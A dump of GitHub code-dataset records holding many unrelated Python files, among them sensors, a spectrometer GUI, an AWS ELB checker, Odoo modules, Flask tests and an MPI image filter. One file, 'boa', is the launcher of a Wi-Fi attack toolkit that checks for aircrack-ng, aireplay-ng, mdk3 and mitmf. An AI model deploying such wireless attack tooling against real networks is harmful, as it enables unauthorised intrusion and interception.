Sensor.\"\"\"\n\n entity_description: HealthboxRoomSensorEntityDescription\n\n def __init__(\n self,\n coordinator: HealthboxDataUpdateCoordinator,\n description: HealthboxRoomSensorEntityDescription,\n ) -> None:\n \"\"\"Initialize Sensor Domain.\"\"\"\n super().__init__(coordinator)\n\n self.entity_description = description\n self._attr_unique_id = f\"{coordinator.config_entry.entry_id}-{description.room.room_id}-{description.key}\"\n self._attr_name = f\"{description.name}\"\n self._attr_device_info = DeviceInfo(\n name=self.entity_description.room.name,\n identifiers={\n (\n DOMAIN,\n f\"{coordinator.config_entry.unique_id}_{self.entity_description.room.room_id}\",\n )\n },\n manufacturer=\"Renson\",\n model=\"Healthbox Room\",\n )\n\n @property\n def native_value(self) -> float | int | str | Decimal:\n \"\"\"Sensor native value.\"\"\"\n room_id: int = int(self.entity_description.room.room_id)\n\n matching_room = [\n room for room in self.coordinator.api.rooms if int(room.room_id) == room_id\n ]\n\n if len(matching_room) != 1:\n error_msg: str = f\"No matching room found for id {room_id}\"\n LOGGER.error(error_msg)\n else:\n matching_room = matching_room[0]\n return self.entity_description.value_fn(matching_room)\n\n return None\n","repo_name":"rmassch/healthbox-hacs","sub_path":"custom_components/healthbox/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":13397,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"43173884971","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtGui, uic, QtWidgets\nfrom PyQt5.QtGui import QImage, QPalette, QBrush, QPixmap, QIcon\nfrom PyQt5.QtCore import QSize, pyqtSlot, QTimer\nfrom PyQt5.uic import loadUi\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nimport math\nimport sympy\nfrom PIL import ImageTk, Image\nfrom scipy import signal\nimport matplotlib.pyplot as plt\nfrom sympy import *\nfrom os import remove\nfrom os import path\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\nimport os\nhavezero = 0\n\nFPER = \"spectra\"\nOUTDIR = \"output\"\ntry:\n os.stat( OUTDIR )\nexcept:\n os.mkdir( OUTDIR )\n\nint = 1\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n # call QWidget constructor\n\n super( MainWindow, self ).__init__()\n loadUi( 'app.ui', self )\n #figure\n self.spectrum = plt.figure()\n self.canvas = FigureCanvas( self.spectrum )\n #self.toolbar = NavigationToolbar( self.canvas, self )\n #self.layout.addWidget( self.toolbar )\n self.layout.addWidget( self.canvas )\n pixmap = QPixmap('visible-spectrum.png')\n self.image1.setPixmap(pixmap)\n #camera\n # create a timer\n self.timer=QTimer()\n # set timer timeout callback function\n self.timer.timeout.connect(self.viewCam)\n # set control_bt callback clicked function\n self.control_bt.clicked.connect(self.controlTimer)\n self.savebutton.clicked.connect( self.save)\n # view camera\n def viewCam(self):\n global frame\n global ret\n # read image in BGR format\n ret, image = self.cap.read()\n # convert image to RGB format\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # get image infos\n height, width, channel = image.shape\n step = channel * width\n # create QImage from image\n qImg = QImage(image.data, width, height, step, QImage.Format_RGB888)\n # show image in img_label\n self.video_label.setPixmap(QPixmap.fromImage(qImg))\n #code\n ret, frame = self.cap.read()\n key = cv2.waitKey( 1 ) & 0xFF\n self.spectrum.clear()\n self.spectrum.add_subplot( 2, 1, 1 )\n if (int):\n global sy, yy, yyc,bgfreqr,bgfreqg,bgfreqb,bgfreqt,freqr,freqg,freqb,freqt\n sy = frame.shape[0]\n yy = np.array( range( sy ) )\n yyc = .8611 * yy + 310.0492\n bgfreqr = yy * 0\n bgfreqg = yy * 0\n bgfreqb = yy * 0\n bgfreqt = yy * 0\n\n freqr = frame[:, :, 2].sum( axis=1 );\n freqr = freqr - min( freqr )\n freqg = frame[:, :, 1].sum( axis=1 );\n freqg = freqg - min( freqg )\n freqb = frame[:, :, 0].sum( axis=1 );\n freqb = freqb - min( freqb )\n freqt = freqr + freqg + freqb\n\n plt.clf()\n\n # plt.axis([0, yy[-1], 100, 4E5])\n plt.axis( [yyc[0], yyc[-1], 100, 4E5] )\n plt.yscale( 'log' )\n\n plt.plot( yyc, freqt, color='gray' )\n plt.plot( yyc, freqr, color='red' )\n plt.plot( yyc, freqg, color='green' )\n plt.plot( yyc, freqb, color='blue' )\n\n # plt.axvline(180,color='blue');\n # plt.axvline(260,color='green');\n # plt.axvline(360,color='red');\n plt.axvline( 390, color='purple' );\n plt.axvline( 470, color='blue' );\n plt.axvline( 525, color='green' );\n plt.axvline( 590, color='yellow' );\n plt.axvline( 624, color='red' );\n plt.axvline( 625, color='orange' );\n plt.xlabel( \"Wavelength (nm)\" )\n plt.ylabel( \"Illuminant Power\" )\n #time.sleep(.2)\n self.canvas.draw()\n\n\n\n # start/stop timer\n def controlTimer(self):\n # if timer is stopped\n if not self.timer.isActive():\n # create video capture\n self.cap = cv2.VideoCapture(0)\n # start timer\n self.timer.start(20)\n # update control_bt text\n self.control_bt.setText(\"Stop\")\n\n\n # if timer is started\n else:\n self.video_label.setStyleSheet( \"background-color: rgb(0, 0, 0)\" )\n # stop timer\n self.timer.stop()\n # release video capture\n self.cap.release()\n # update control_bt text\n self.control_bt.setText(\"View\")\n self.video_label.setStyleSheet( \"background-color: rgb(0, 0, 0)\" )\n\n def save(self):\n\n FPER = self.labelrute.text()\n fname = OUTDIR + \"/\" + FPER + \"_\" + str( time.time() )\n plt.savefig( fname + \".png\", dpi=200 )\n cv2.imwrite( fname + \"_raw.bmp\", frame )\n dt = np.dtype(\n [('x', '|i'), ('l', 'd'), ('red', 'i'), ('green', 'i'), ('blue', 'i'), ('total', 'i'), ('bgred', 'i'),\n ('bggreen', 'i'), ('bgblue', 'i'), ('bgtotal', 'i')] )\n a = np.zeros( len( yy ), dt )\n a['x'] = yy;\n a['l'] = yyc;\n a['red'] = freqr;\n a['green'] = freqg;\n a['blue'] = freqb;\n a['total'] = freqt\n a['bgred'] = bgfreqr;\n a['bggreen'] = bgfreqg;\n a['bgblue'] = bgfreqb;\n a['bgtotal'] = bgfreqt\n np.savetxt( fname + '_data.txt', a, '%s', header=\"x l red green blue bgred bggreen bggblue\", comments='' )\n #print(\"saved \" + fname)\n time.sleep(.5)\n global name\n name = self.labelrute.text()\n noti = Notification( self )\n noti.show()\n\n\nclass Notification(QDialog):\n def __init__(self, parent=None):\n super( Notification, self ).__init__( parent )\n loadUi( 'notification.ui', self )\n self.buttonClose.clicked.connect( self.ok)\n self.labelName.setText(name)\n\n def ok(self):\n self.parent().show()\n self.close()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n GUI = MainWindow()\n GUI.show()\n sys.exit(app.exec_())\n\n\n\n\n\n","repo_name":"javimenba/spectrometer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29500843616","text":"import numpy as np\nfrom matplotlib import colors\n\nfrom tqdm import trange\n\ntry:\n from SI_Toolkit_ApplicationSpecificFiles.predictors_customization import STATE_VARIABLES, STATE_INDICES\nexcept ModuleNotFoundError:\n print('SI_Toolkit_ApplicationSpecificFiles not yet created')\n\nfrom SNN.predictor_autoregressive_SNN import predictor_autoregressive_SNN\n\n# This import mus go before pyplot so also before our scripts\nfrom matplotlib import use, get_backend\n# Use Agg if not in scientific mode of Pycharm\n\nif get_backend() != 'module://backend_interagg':\n use('Agg')\n\n\ncdict = {'red': ((0.0, 0.22, 0.0),\n (0.5, 1.0, 1.0),\n (1.0, 0.89, 1.0)),\n\n 'green': ((0.0, 0.49, 0.0),\n (0.5, 1.0, 1.0),\n (1.0, 0.12, 1.0)),\n\n 'blue': ((0.0, 0.72, 0.0),\n (0.5, 0.0, 0.0),\n (1.0, 0.11, 1.0))}\n\ncmap = colors.LinearSegmentedColormap('custom', cdict)\n\ndef get_data_for_gui_SNN(a, dataset, net_name, mode):\n states_0 = dataset[STATE_VARIABLES].to_numpy()[:-a.test_max_horizon, :]\n\n Q = dataset['Q'].to_numpy()\n Q_array = [Q[i:-a.test_max_horizon+i] for i in range(a.test_max_horizon)]\n Q_array = np.vstack(Q_array).transpose()\n\n if mode == 'batch':\n print('batch mode')\n # All at once\n predictor = predictor_autoregressive_SNN(horizon=a.test_max_horizon, batch_size=a.test_len, net_name=net_name)\n predictor.setup(initial_state=states_0, prediction_denorm=True)\n output_array = predictor.predict(Q_array)\n elif mode == 'sequential':\n print('sequential mode')\n predictor = predictor_autoregressive_SNN(horizon=a.test_max_horizon, batch_size=1, net_name=net_name)\n\n # Iteratively (to test internal state update)\n output_array = np.zeros([a.test_len, a.test_max_horizon + 1, len(STATE_VARIABLES) + 1], dtype=np.float32)\n for timestep in trange(a.test_len):\n Q_current_timestep = Q_array[np.newaxis, timestep, :]\n s_current_timestep = states_0[timestep, np.newaxis]\n\n predictor.setup(initial_state=s_current_timestep, prediction_denorm=True)\n #predictor.setup(initial_state=s_current_timestep, prediction_denorm=False)\n\n output_array[timestep,:,:] = predictor.predict(Q_current_timestep)\n predictor.update_internal_state(Q_current_timestep[0, 0])\n\n else:\n raise ValueError(\"Mode should be either 'batch' or 'sequential'\")\n\n output_array = output_array[..., [STATE_INDICES.get(key) for key in a.features]+[-1]]\n #print(output_array.shape) # shape = (161,41,7)\n #print(output_array)\n\n # time_axis is a time axis for ground truth\n return output_array\n","repo_name":"neuromorphs/LTC21-SNN","sub_path":"For_CartPoleSimulation/SNN/get_prediction_SNN_predictor.py","file_name":"get_prediction_SNN_predictor.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72633514346","text":"def f():\n print(\"这是一个函数\")\n\n\nf()\n\nmoney: float = 5000000\n\n\ndef mes(user: str, s: str):\n while True:\n msg = int(input(f\"\"\"\n{s * 10}主菜单{s * 10}\n {user},您好,欢迎使用本行ATM,请选择操作\n 查询余额[输入1]\n 存款[输入2]\n 取款[输入3]\n 退出[输入4]\n 请输入您的选择:\\t\n\"\"\"))\n if msg == 1:\n cha(user, s)\n elif msg == 2:\n sav_money = float(input(\"存款金额:\\t\"))\n cun(user, sav_money)\n elif msg == 3:\n qu_money = float(input(\"取款金额:\\t\"))\n qu(user, qu_money)\n elif msg == 4:\n break\n else:\n print(f\"输入非法,请重输\")\n\n\ndef cha(user: str, s: str):\n print(f\"{s * 10}查询结果{s * 10}\")\n yu(user, 1, 0)\n\n\ndef yu(user: str, typ: int, mone: float):\n global money # 引用全局变量\n if typ == 2:\n money += mone\n elif typ == 3:\n if mone <= money:\n money -= mone\n print(f\"\"\"{user},您好,您的余额剩余{round(money, 2)} \"\"\")\n\n\ndef cun(user: str, mone: float):\n # global money # 引用全局变量\n if mone >= 0.01:\n print(f\"{user},您好,您存款{mone}元成功\")\n yu(user, 2, mone)\n else:\n print(\"最低金额0.01元\")\n\n\ndef qu(user: str, mone: float):\n # global money # 引用全局变量\n if mone > money:\n print(f\"{user},您好,您取款{mone}元失败——余额不足\")\n else:\n print(f\"{user},您好,您取款{mone}元成功\")\n yu(user, 3, mone)\n\n\nmes(\"柳和\", \"***\")\n","repo_name":"FengMo1314/Python","sub_path":"itwanhe/day03_2022-11-8/函数.py","file_name":"函数.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25752683701","text":"with open(\"day15.txt\", \"r\") as f:\n\ti = [int(x) for x in f.readline().split(\",\")]\n\ndef find(num,init):\n\tm = {}\n\tn = 1\n\tl = None\n\tfor x in init:\n\t\tif l is not None:\n\t\t\tm[l] = n\n\t\tl = x\n\t\tn += 1\n\twhile n <= num:\n\t\tif l in m:\n\t\t\tnl = n-m[l]\n\t\telse:\n\t\t\tnl = 0\n\t\tm[l] = n\n\t\tl = nl\n\t\tn += 1\n\treturn l\n\npart1 = find(2020,i)\nprint(part1)\npart2 = find(30000000,i)\nprint(part2)","repo_name":"floh0/advent-of-code-2020","sub_path":"day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2883371536","text":"from re import T\nfrom typing import Dict\nimport boto3\nfrom botocore.config import Config\n\ndef getTargetHealth(answers) -> Dict:\n \"\"\"Retrieves all target status in this Target Group\"\"\"\n\n if not answers['standard_regions']:\n region = answers['other_regions']\n else: region = answers['standard_regions']\n \n config = Config(\n region_name = region,\n signature_version = 'v4',\n retries = {\n 'max_attempts': 10,\n 'mode': 'standard'\n }\n )\n\n tg_target_count = [] #for all tg ---> won't work if need to filter healthy targets\n if answers['elb_type'] == 'classic':\n \n client = boto3.client('elb',config=config)\n response = client.describe_instance_health(LoadBalancerName=answers['elb'])\n try: \n response[\"InstanceStates\"][0]\n except KeyError as error_no_targets:\n # reraise the error\n raise error_no_targets\n except IndexError as error_no_targets:\n # reraise the error\n print(\"\\033[91mError: There is no registered targets.\\033[0m\")\n raise error_no_targets \n\n return response,tg_target_count\n\n else: \n client = boto3.client('elbv2',config=config)\n for i in answers['tg']:\n if 'response' not in locals(): \n response = client.describe_target_health(TargetGroupArn=i['tg_arn'])\n tg_target_count.append(len(response['TargetHealthDescriptions']))\n #if there are multiple TGs or all TGs selected, keep appending the target health response\n else:\n temp = client.describe_target_health(TargetGroupArn=i['tg_arn'])\n tg_target_count.append(len(temp['TargetHealthDescriptions']))\n response['TargetHealthDescriptions'] = response['TargetHealthDescriptions']+temp['TargetHealthDescriptions']\n\n return response,tg_target_count\n \n\"\"\"\n{\n 'TargetHealthDescriptions': [\n {tg1-target1},{tg1-target2},\n {tg2-target1},\n {tg3-target1},{tg3-target2},{tg3-target3}\n ],\n 'ResponseMetadata': {...}\n}\n\"\"\"\n","repo_name":"aws/elb-doctor","sub_path":"elb_doctor/lib/tgs/getTargetHealth.py","file_name":"getTargetHealth.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"74269910186","text":"import skimage.io as io\nimport numpy as np\nfrom skimage import transform as xform\nfrom skimage import color\nfrom skimage import img_as_float, img_as_ubyte\nimport matplotlib.pyplot as plt\nimport glob\nimport os\nimport re\n\norig_dir = '/home/maryana/storage/Posdoc/PLI/2017/2372.10_Optic_Chiasm/blockface/orig'\nseg_dir = '/home/maryana/storage/Posdoc/PLI/2017/2372.10_Optic_Chiasm/blockface/seg'\nseg_dir2 = '/home/maryana/storage/Posdoc/PLI/2017/2372.10_Optic_Chiasm/blockface/seg_highres'\n\n\nfiles = glob.glob(os.path.join(orig_dir,'*.jpg'))\nnFiles = len(files)\nprint(nFiles)\n\nfor fPath in files:\n tind = [m.start() for m in re.finditer('/', fPath)]\n s = tind[-1]\n name = fPath[s + 1:]\n\n print(name)\n\n orig_name = os.path.join(orig_dir, name)\n name = os.path.splitext(name)[0] + '.png'\n seg_name = os.path.join(seg_dir, name)\n newName = os.path.join(seg_dir2, name)\n\n seg_img = io.imread(seg_name)\n mask = seg_img > 0\n\n orig_img = io.imread(orig_name)\n orig_img = img_as_ubyte(color.rgb2gray(orig_img))\n mask2 = xform.resize(mask, orig_img.shape)\n\n orig_img[mask2 <= 0] = 0\n\n io.imsave(newName, orig_img)","repo_name":"grinberglab/high-res-3D-tau","sub_path":"PyRegistration/Segmentation/chiasm_blockseg_highres.py","file_name":"chiasm_blockseg_highres.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"18302472985","text":"def swap_case(s):\n new_s = \"\"\n for el in s:\n if el.islower():\n new_s += el.upper()\n elif el.isupper():\n new_s += el.lower()\n else:\n new_s += el\n return new_s\n\nif __name__ == '__main__':\n s = input()\n result = swap_case(s)\n print(result)\n","repo_name":"jcreighton669/HackerRank-Daily-Challenges","sub_path":"swap_case.py","file_name":"swap_case.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28115264967","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass ProductPack(models.Model):\n _inherit = 'product.template'\n\n def default_pack_location(self):\n company_user = self.env.company\n warehouse = self.env['stock.warehouse'].search([('company_id', '=', company_user.id)], limit = 1)\n if warehouse:\n return warehouse.lot_stock_id.id\n\n is_pack = fields.Boolean('Is a Pack')\n pack_price = fields.Integer(string = \"Pack Price\", compute = 'set_pack_price', store = True)\n pack_products_ids = fields.One2many('pack.products', 'product_tmpl_id', string = 'Pack Products')\n pack_quantity = fields.Integer('Pack Quantity')\n pack_location_id = fields.Many2one('stock.location',\n domain = [('usage', 'in', ['internal', 'transit'])],\n default = default_pack_location)\n\n @api.depends('pack_products_ids', 'pack_products_ids.price')\n def set_pack_price(self):\n price = 0\n for record in self:\n for line in record.pack_products_ids:\n price = price + line.price\n record.pack_price = price\n\n @api.model\n def create(self, values):\n if values.get('is_pack', False):\n if not values.get('pack_products_ids', []):\n raise UserError(_(\n 'You need to add atleast one product in the Pack...!'))\n if values.get('type', False) == 'service':\n raise UserError(_('You cannot define a pack product as a service..!'))\n return super(ProductPack, self).create(values)\n\n def write(self, values):\n super(ProductPack, self).write(values)\n if self.is_pack:\n if not self.pack_products_ids:\n raise UserError(_(\n 'You need to add atleast one product in the Pack...!'))\n if self.type == 'service':\n raise UserError(_('You cannot define a pack product as a service..!'))\n\n def update_price_product(self):\n self.lst_price = self.pack_price\n\n def get_quantity(self):\n total_quantity = 1\n flag = 1\n while flag:\n for line in self.pack_products_ids:\n if line.qty_available >= line.quantity * total_quantity:\n continue\n else:\n if line.product_id.type != 'product':\n continue\n flag = 0\n break\n if flag:\n total_quantity = total_quantity + 1\n self.pack_quantity = total_quantity - 1\n\n def update_quantity(self):\n company_user = self.env.company\n product_id = len(self.product_variant_ids) == 1 and self.product_variant_id.id\n location_id = self.pack_location_id.id\n if not location_id:\n warehouse = self.env['stock.warehouse'].search([('company_id', '=', company_user.id)], limit = 1)\n location_id = warehouse.lot_stock_id.id\n if not location_id:\n raise UserError(_(\n 'You need to select the location to update the pack quantity...!'))\n self.env['stock.quant'].with_context(inventory_mode = True).sudo().create({\n 'product_id': product_id,\n 'location_id': location_id,\n 'inventory_quantity': self.pack_quantity,\n })\n\n @api.onchange('pack_location_id')\n def change_quantity_based_on_location(self):\n for line in self.pack_products_ids:\n stock_quant = self.env['stock.quant'].search(\n [('product_id', '=', line.product_id.id), ('location_id', '=', self.pack_location_id.id)])\n if stock_quant:\n line.total_available_quantity = stock_quant.quantity\n\n else:\n line.total_available_quantity = stock_quant.quantity","repo_name":"techkitebusiness/CybroAddons","sub_path":"product_combo_pack/models/product_form.py","file_name":"product_form.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13027173327","text":"class Solution:\n # @param matrix, a list of lists of integers\n # @param target, an integer\n # @return a boolean\n def searchMatrix(self, matrix, target):\n if len(matrix) == 0: return False\n n, m = len(matrix), len(matrix[0])\n x = 0\n y = m - 1\n while x < n and y >= 0:\n if matrix[x][y] == target: return True\n if matrix[x][y] > target: y -= 1\n else: x += 1\n return False\n","repo_name":"philokey/Algorithm-Problems","sub_path":"Leetcode/Search a 2D Matrix.py","file_name":"Search a 2D Matrix.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22348138905","text":"import sys\nimport os\nfrom time import sleep\nfrom .tools.util import help, bcolors, version, clear\nfrom .tools.process import Process\nfrom .tools.runner import run\n\n\ndef dependency_check():\n ''' Check that required programs are installed '''\n required_apps = ['airmon-ng', 'iwconfig', 'ifconfig', 'aircrack-ng',\n 'aireplay-ng', 'airodump-ng', 'ship', 'netcat', 'nc', 'mdk3', 'mitmf']\n missing_required = False\n\n for app in required_apps:\n if not Process.exists(app):\n missing_required = True\n print(bcolors.FAIL + '{!} {R}error: required app {O}%s{R} was not found' % app + bcolors.ENDC)\n\n if missing_required:\n print(bcolors.FAIL +\n '{!} {R}required app(s) were not found, exiting.{W}' + bcolors.ENDC)\n sys.exit(-1)\n\ndef main():\n if (os.popen('whoami').read() == 'root\\n'):\n # Setup args\n args = sys.argv[1:]\n\n # Handle Arguments\n for arg in args:\n if (arg == \"--help\" or arg == \"-h\"):\n clear()\n intro()\n help()\n sys.exit(0)\n elif (arg == \"--version\" or arg == \"-v\"):\n version()\n sys.exit(0)\n # print('passed argument :: {}'.format(arg))\n\n try:\n # Run into loop\n dependency_check()\n clear()\n intro()\n sleep(3)\n run()\n sys.stdout.write('\\b\\b\\r') # Current solution\n sys.stdout.flush()\n except KeyboardInterrupt:\n sys.exit(0)\n else:\n print(bcolors.FAIL + \"Please run Boa as root.\" + bcolors.ENDC)\n sys.exit(0)\n\n\ndef intro():\n print(bcolors.OKGREEN + '888\\n888\\n888\\n88888b. .d88b. 8888b.\\n888 \"88bd88\"\"88b \"88b\\n888 888888 888.d888888\\n888 d88PY88..88P888 888\\n88888P\" \"Y88P\" \"Y888888\\n ' + bcolors.ENDC)\n print(bcolors.WARNING + \"\\n ,,'6\\'\\'-,.\\n <====,.;;--.\\n _`---===. \\\"\\\"\\\"==__\\n //\\\"\\\"@@-\\===\\@@@@ \\\"\\\"\\\\\\\\\\n |( @@@ |===| @@@ ||\\n \\\\ @@ |===| @@ //\\n \\\\ @@ |===|@@@ //\\n \\\\ |===| //\\n___________\\\\|===| //_____,----\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"-----,_\\n \\\"\\\"\\\"\\\"---,__`\\===`/ _________,---------,____ `,\\n |==|| `\\ \\n |==| | ) |\\n |==| | _____ ______,--\\' \\'\\n |=| `----\\\"\\\\\"\" `\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"'_,-'\\n `=\\ __,---\\\"\\\"\\\"-------------\\\"\\\"\\\"\\'\\'\\n \\\"\\\"\\\"\\\"\\n\")\n print('\\n' + bcolors.OKGREEN + 'Developed by ajmwagar' + bcolors.ENDC)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ajmwagar/boa","sub_path":"boa/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71414484266","text":"from flask_testing import TestCase\nimport json\nfrom tests import app\nfrom arcdesigns.app import create_app\nfrom arcdesigns.config import TestingConfig\nfrom arcdesigns.database import db as _db\nimport os\n\n\n\nclass BaseTestCase(TestCase):\n\n \"\"\" base test class for testing endpoints \"\"\"\n\n\n def create_app(self):\n return create_app(TestingConfig)\n\n def setUp(self):\n self.app = app\n self.client = self.app.test_client()\n _db.create_all()\n self.test_user = {\"username\":\"david\",\"email\":\"david@gmail.com\",\\\n \"password\":\"wrej@jafcd\"}\n self.post = {\"body\": \"this is a 3 bedroom house buy it\",\n \"cost\": 500,\n \"description\": \"3 bedroom house\",\n \"image\": \"img/design.jpeg\",\n \"title\": \"PL123\"\n }\n \n \n def tearDown(self):\n _db.session.remove()\n _db.drop_all()\n\n \n def register_user(self):\n response = self.client.post('/api/auth/signup',\\\n json = {'user': self.test_user }, content_type='application/json' )\n return response\n\n\n def login_user(self):\n return self.client.post('/api/auth/login',\\\n json = {\"user\": self.test_user }, content_type='application/json')\n\n\n def generate_token(self):\n self.register_user()\n response = self.login_user()\n data = json.loads(response.data.decode())\n return 'Bearer ' + data['user']['token']\n\n\n def make_post(self):\n response = self.client.post( '/api/designs',content_type='application/json',\\\n headers={'Authorization': self.generate_token()}, json = {\"post\": self.post})\n return response\n\n def get_all_posts(self):\n response = self.client.get('/api/designs', content_type='application/json',\\\n headers={'Authorization': self.generate_token()})\n return response\n\n def add_to_cart(self):\n self.make_post()\n response = self.client.post('/api/designs/cart/1', content_type='application/json',\\\n headers={'Authorization': self.generate_token()})\n return response\n\n\n \n \n ","repo_name":"kayongopique/flask-arc-designs","sub_path":"tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73869755626","text":"import os\r\nimport sys\r\nimport numpy as np\r\nfrom mpi4py import MPI\r\n\r\ncomm = MPI.COMM_WORLD\r\nrank = comm.Get_rank()\r\n\r\nmessage_count = 0\r\ndebug_arg = \"\"\r\n\r\nif len(sys.argv) > 1:\r\n debug_arg = sys.argv[1]\r\n\r\ndebug = True if debug_arg == \"debug\" else False\r\n\r\n# Clear file\r\nif debug:\r\n f = open(\"debug\" + str(rank) + \".txt\", \"w\").close()\r\n\r\n# Each array is the rank of the process that will filter the image.\r\n# We will filter 4 sub arrays concurrently. The other 12 will be responsible\r\n# for providing the neighbor pixels.\r\norder_arr = [\r\n [0, 6, 8, 14],\r\n [1, 7, 9, 15],\r\n [2, 4, 10, 12],\r\n [3, 5, 11, 13]\r\n]\r\n\r\n# This keeps track of each order of subimages we're filtering\r\norder_idx = 0\r\n\r\nsub_images = [\r\n [0, 1, 2, 3],\r\n [4, 5, 6, 7],\r\n [8, 9, 10, 11],\r\n [12, 13, 14, 15]\r\n]\r\n\r\nrank_neighbors = [\r\n [1, 4, 5], # Rank 0 neighbors\r\n [0, 2, 4, 5, 6], # Rank 1 neighbors\r\n [1, 3, 5, 6, 7], # Rank 2 neighbors\r\n [2, 6, 7], # Rank 3 neighbors\r\n [0, 1, 5, 8, 9], # Rank 4 neighbors\r\n [0, 1, 2, 4, 6, 8, 9, 10], # Rank 5 neighbors\r\n [1, 2, 3, 5, 7, 9, 10, 11], # Rank 6 neighbors\r\n [2, 3, 6, 10, 11], # Rank 7 neighbors\r\n [4, 5, 9, 12, 13], # Rank 8 neighbors\r\n [4, 5, 6, 8, 10, 12, 13, 14], # Rank 9 neighbors\r\n [5, 6, 7, 9, 11, 13, 14, 15], # Rank 10 neighbors\r\n [6, 7, 10, 14, 15], # Rank 11 neighbors\r\n [8, 9, 13], # Rank 12 neighbors\r\n [8, 9, 10, 12, 14], # Rank 13 neighbors\r\n [9, 10, 11, 13, 15], # Rank 14 neighbors\r\n [10, 11, 14] # Rank 15 neighbors\r\n]\r\n\r\ngaussian_kernel = [\r\n [0, 0, 3, 2, 2, 2, 3, 0, 0],\r\n [0, 2, 3, 5, 5, 5, 3, 2, 0],\r\n [3, 3, 5, 3, 0, 3, 5, 3, 3],\r\n [2, 5, 3, -12, -23, -12, 3, 5, 2],\r\n [2, 5, 0, -23, -40, -23, 0, 5, 2],\r\n [2, 5, 3, -12, -23, -12, 3, 5, 2],\r\n [3, 3, 5, 3, 0, 3, 5, 3, 3],\r\n [0, 2, 3, 5, 5, 5, 3, 2, 0],\r\n [0, 0, 3, 2, 2, 2, 3, 0, 0],\r\n]\r\n\r\ndef printr(msg, bypass=False):\r\n global message_count\r\n message_count += 1\r\n\r\n if debug and (message_count % 400 == 0 or bypass):\r\n f = open(\"debug\" + str(rank) + \".txt\", \"a+\")\r\n f.write(\"\\n\" + \"Message (\" + str(message_count) + \"): \" + msg)\r\n f.close()\r\n\r\n\r\n# Three Scenarios here when iterating over the gaussian matrix:\r\n# A) The kernel fits within our sub image, in which case we can just filter normally,\r\n# B) The kernel is outside the sub image but still inside the entire image, in which case we need to use MPI to get the value of the pixel that is outside our sub image bounds\r\n# C) The kernel is outside the sub image AND outside the entire image, in which case we set that value to 0 (Or in this functions case, we just don't do anything)\r\ndef filter_pixel(x, y, min_x, min_y, max_x, max_y):\r\n\r\n filtered_pixel = 0\r\n\r\n for j in range(9):\r\n for i in range(9):\r\n image_x_offset = i - 4\r\n image_y_offset = j - 4\r\n\r\n image_x = x + image_x_offset\r\n image_y = y + image_y_offset\r\n\r\n if (image_x < min_x or image_x > max_x or image_y < min_y or image_y > max_y) and (image_x >= 0 and image_x < 256 and image_y >= 0 and image_y < 256):\r\n\r\n # If were outside our sub image bounds, we need to call our neighbor in order to retreive the correct pixel\r\n neighbor_x = 0\r\n neighbor_y = 0\r\n \r\n # Find neighbor that has the pixel were looking for\r\n for row in range(4):\r\n for col in range(4):\r\n if rank == sub_images[row][col]:\r\n neighbor_x = col\r\n neighbor_y = row\r\n\r\n if image_x < min_x:\r\n neighbor_x -= 1\r\n elif image_x > max_x:\r\n neighbor_x += 1\r\n\r\n if image_y < min_y:\r\n neighbor_y -= 1\r\n elif image_y > max_y:\r\n neighbor_y += 1\r\n\r\n printr(\"Requesting pixel from neighbor: \" + str(sub_images[neighbor_y][neighbor_x]))\r\n req = comm.isend([image_y, image_x], dest=sub_images[neighbor_y][neighbor_x])\r\n req.wait()\r\n\r\n req = comm.irecv(source=sub_images[neighbor_y][neighbor_x])\r\n pixel_value = req.wait()\r\n\r\n filtered_pixel += gaussian_kernel[j][i] * pixel_value\r\n\r\n elif image_x >= 0 and image_x < 256 and image_y >= 0 and image_y < 256:\r\n filtered_pixel += gaussian_kernel[j][i] * original_image[image_y][image_x]\r\n\r\n if filtered_pixel > 255:\r\n filtered_pixel = 255\r\n\r\n if filtered_pixel < 0:\r\n filtered_pixel = 0\r\n\r\n return filtered_pixel\r\n\r\n# Create a matrix of 0s and fill it for the original image\r\npixel_values_1d = []\r\n\r\nf = open(\"pepper.ascii.pgm\", \"r\")\r\n\r\nlines = f.readlines()\r\nline_count = 